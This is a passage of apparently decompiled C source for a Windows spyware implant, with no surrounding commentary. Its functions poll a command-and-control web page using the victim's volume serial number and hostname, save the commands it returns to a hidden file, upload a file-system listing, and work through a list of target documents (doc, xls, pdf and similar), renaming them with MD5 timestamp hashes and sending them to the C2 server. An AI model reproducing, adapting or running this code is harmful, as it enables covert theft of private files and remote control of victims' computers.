"%s?action=getcmd&hostid=%s&hostname=%s", g_szWebPage, g_szVolumeSerialNr, g_szHostname); 636 | 637 | char *lpMem = (char *)GetFromURL(szGetURL, &dwGetSize); 638 | if (NULL == lpMem) 639 | return FALSE; 640 | 641 | const char szBegin[13] = "[CmdBegin]\r\n"; 642 | const char szEnd[11] = "[CmdEnd]\r\n"; 643 | 644 | if (_strnicmp(lpMem, szBegin, strlen(szBegin)) || _strnicmp(lpMem + dwGetSize - strlen(szEnd), szEnd, strlen(szEnd))) 645 | { 646 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpMem); 647 | return FALSE; 648 | } 649 | 650 | HANDLE hFile = CreateFile(g_szStat_T, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL); 651 | if (INVALID_HANDLE_VALUE == hFile) 652 | { 653 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpMem); 654 | return FALSE; 655 | } 656 | 657 | DWORD dwWritten = 0; 658 | WriteFile(hFile, lpMem, dwGetSize, &dwWritten, 0); 659 | 660 | CloseHandle(hFile); 661 | 662 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpMem); 663 | return TRUE; 664 | } 665 | 666 | BOOL SendCMDRecvToC2() 667 | { 668 | CHAR szURL[MAX_PATH]; 669 | 670 | sprintf(szURL, "%s?action=gotcmd&hostid=", g_szWebPage); 671 | strcat(szURL, g_szVolumeSerialNr); 672 | strcat(szURL, "&hostname="); 673 | strcat(szURL, g_szHostname); 674 | 675 | DWORD nGetSize = 0; 676 | const char *lpGetData = (const char *)GetFromURL(szURL, &nGetSize); 677 | if (NULL == lpGetData) 678 | return FALSE; 679 | 680 | BOOL bRet = FALSE; 681 | if (!_strnicmp(lpGetData, "Success", strlen("Success"))) 682 | bRet = TRUE; 683 | 684 | HeapFree(GetProcessHeap(), 0, (LPVOID)lpGetData); 685 | return bRet; 686 | } 687 | 688 | BOOL SendEnumFSToC2() 689 | { 690 | HANDLE hFile = CreateFile(g_szEnumFS, 0x80000000, 1, 0, 3, 0x80, 0); 691 | if (INVALID_HANDLE_VALUE == hFile) 692 | return FALSE; 693 | 694 | CloseHandle(hFile); 695 | 696 | time_t tTime; 697 | time(&tTime); 698 | 699 | struct tm *_tm = localtime(&tTime); 700 | 701 | CHAR szFileList[MAX_PATH]; 702 | sprintf(szFileList, 703 | "FileList-%02u%02u-%02u%02u%02u.ini", 704 | _tm->tm_mon + 1, 705 | _tm->tm_mday, 706 | _tm->tm_hour, 707 | _tm->tm_min, 708 | _tm->tm_sec 709 | ); 710 | 711 | return SendFileToC2(g_szEnumFS, szFileList); 712 | } 713 | 714 | BOOL SendDNListFilesToC2() 715 | { 716 | #ifndef NO_HASH_MD5 717 | CMD5 lpMD5; 718 | #endif 719 | BOOL v0 = FALSE; 720 | 721 | HANDLE hDNFile = CreateFile(g_szDNList, 0x80000000u, 1u, 0, 3u, 0x80u, 0); 722 | if (INVALID_HANDLE_VALUE == hDNFile) 723 | return FALSE; 724 | 725 | CloseHandle(hDNFile); 726 | 727 | CHAR szTypeLimit[64]; 728 | GetPrivateProfileString("Other", "TypeLimit", "True", szTypeLimit, 64u, g_szDNList); 729 | 730 | g_bUseTypeLimit = _stricmp(szTypeLimit, "True") == 0; 731 | if (TRUE == g_bUseTypeLimit) 732 | { 733 | GetPrivateProfileString("Other", "Types", "doc,docx,xls,xlsx,txt,rtf,pdf", g_szAcceptedFileTypes, 64, g_szDNList); 734 | _strlwr(g_szAcceptedFileTypes); 735 | } 736 | 737 | int k = GetPrivateProfileInt("Filelist", "filetotal", 0, g_szDNList); 738 | for (int i = k; ; k = i) 739 | { 740 | if (k <= 0) 741 | { 742 | v0 = TRUE; 743 | break; 744 | } 745 | 746 | CHAR szFileIndex[16]; 747 | sprintf(szFileIndex, "f%d", k); 748 | 749 | CHAR szFilePath[MAX_PATH]; 750 | GetPrivateProfileString("Filelist", szFileIndex, g_szBlank, szFilePath, MAX_PATH, g_szDNList); 751 | if (strlen(szFilePath)) 752 | { 753 | char szFileExt[MAX_PATH] = {}; 754 | char *v4 = strrchr(szFilePath, '.'); 755 | if (NULL != v4) 756 | { 757 | sprintf(szFileExt, "%s", v4 + 1); 758 | _strlwr(szFileExt); 759 | } 760 | 761 | CHAR szAccepted[MAX_PATH]; 762 | if (TRUE == g_bUseTypeLimit) 763 | { 764 | CHAR szExt[MAX_PATH]; 765 | 766 | sprintf(szAccepted, ",%s,", g_szAcceptedFileTypes); 767 | sprintf(szExt, ",%s,", szFileExt); 768 | 769 | if (!strstr(szAccepted, szExt)) 770 | { 771 | WritePrivateProfileString("Filelist", szFileIndex, 0, g_szDNList); 772 | sprintf(szFileIndex, "%d", --i); 773 | 774 | WritePrivateProfileString("Filelist", "filetotal", szFileIndex, g_szDNList); 775 | continue; 776 | } 777 | } 778 | 779 | HANDLE hFile = CreateFile(szFilePath, 0x80000000u, 1u, 0, 3u, 0x80u, 0); 780 | if (INVALID_HANDLE_VALUE == hFile) 781 | { 782 | if (GetLastError() != 2) 783 | { 784 | GetPrivateProfileString("Filelist", "f1", g_szBlank, szAccepted, MAX_PATH, g_szDNList); 785 | WritePrivateProfileString("Filelist", "f1", szFilePath, g_szDNList); 786 | WritePrivateProfileString("Filelist", szFileIndex, szAccepted, g_szDNList); 787 | 788 | v0 = TRUE; 789 | break; 790 | } 791 | } 792 | else 793 | { 794 | DWORD dwFileSizeHigh = 0; 795 | DWORD dwFileSize = GetFileSize(hFile, &dwFileSizeHigh); 796 | 797 | FILETIME LastWriteTime; 798 | GetFileTime(hFile, 0, 0, &LastWriteTime); 799 | 800 | CloseHandle(hFile); 801 | 802 | if (g_dwMaxFileSizeKB && (dwFileSize == -1 || dwFileSize > g_dwMaxFileSizeKB << 10 || dwFileSizeHigh > 0)) 803 | { 804 | WritePrivateProfileString("Filelist", szFileIndex, 0, g_szDNList); 805 | sprintf(szFileIndex, "%d", --i); 806 | 807 | WritePrivateProfileString("Filelist", "filetotal", szFileIndex, g_szDNList); 808 | continue; 809 | } 810 | 811 | CHAR szFileTimestamp[292] = {}; 812 | CHAR szFileNetName[MAX_PATH] = {}; 813 | 814 | SYSTEMTIME SystemTime; 815 | FileTimeToSystemTime(&LastWriteTime, &SystemTime); 816 | 817 | sprintf(szFileTimestamp, 818 | "%s %d-%02d-%02d %02d:%02d:%02d:%03d", 819 | szFilePath, 820 | SystemTime.wYear, 821 | SystemTime.wMonth, 822 | SystemTime.wDay, 823 | SystemTime.wHour, 824 | SystemTime.wMinute, 825 | SystemTime.wSecond, 826 | SystemTime.wMilliseconds 827 | ); 828 | 829 | #ifndef NO_HASH_MD5 830 | sprintf(szFileNetName, "%s", lpMD5.GetStringMD5(szFileTimestamp)); 831 | #else 832 | sprintf(szFileNetName, "%s", szFileTimestamp); 833 | #endif 834 | 835 | char *lpszFileExt = strrchr(szFilePath, '.'); 836 | sprintf(szFileTimestamp, szFileNetName); 837 | sprintf(szFileNetName, 838 | "%d-%02d-%02d-%02d-%02d-%s", 839 | SystemTime.wYear, 840 | SystemTime.wMonth, 841 | SystemTime.wDay, 842 | SystemTime.wHour, 843 | SystemTime.wMinute, 844 | szFileTimestamp 845 | ); 846 | 847 | if (NULL != lpszFileExt) 848 | strcat(szFileNetName, lpszFileExt); 849 | 850 | SendFileToC2(szFilePath, szFileNetName); 851 | } 852 | 853 | WritePrivateProfileString("Filelist", szFileIndex, 0, g_szDNList); 854 | } 855 | 856 | sprintf(szFileIndex, "%d", --i); 857 | WritePrivateProfileString("Filelist", "filetotal", szFileIndex, g_szDNList); 858 | } 859 | 860 | return v0; 861 | } 862 | --------------------------------------------------------------------------------